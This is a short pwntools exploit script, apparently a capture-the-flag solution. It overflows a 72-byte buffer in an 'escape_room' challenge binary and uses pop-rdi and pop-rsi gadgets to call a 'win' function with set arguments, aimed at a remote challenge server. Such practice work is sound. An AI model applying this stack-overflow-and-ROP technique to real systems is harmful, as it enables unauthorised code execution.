34 lines
581 B
Python
34 lines
581 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
context.binary = elf = ELF("./escape_room", checksec=False)
|
|
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13566)
|
|
# p.recvuntil(b"keys?\n")
|
|
# Your exploit here
|
|
|
|
var1 = 0xDEADBEEF
|
|
var2 = 0xCAFEBABE
|
|
OFFSET = 72
|
|
# Gadget to overwrite rdi e rsi (pop)
|
|
# (Creati in main.c)
|
|
rdi = 0x401287
|
|
rsi = 0x401289
|
|
ret = 0x40101A
|
|
# win addr
|
|
win = 0x40121B
|
|
payload = flat(
|
|
b"A" * OFFSET,
|
|
p64(rsi),
|
|
p64(var2),
|
|
p64(rdi),
|
|
p64(var1),
|
|
p64(ret),
|
|
p64(win),
|
|
)
|
|
p.send(payload)
|
|
# p.send(b'cat flag\n')
|
|
# p.recv()
|
|
p.interactive()
|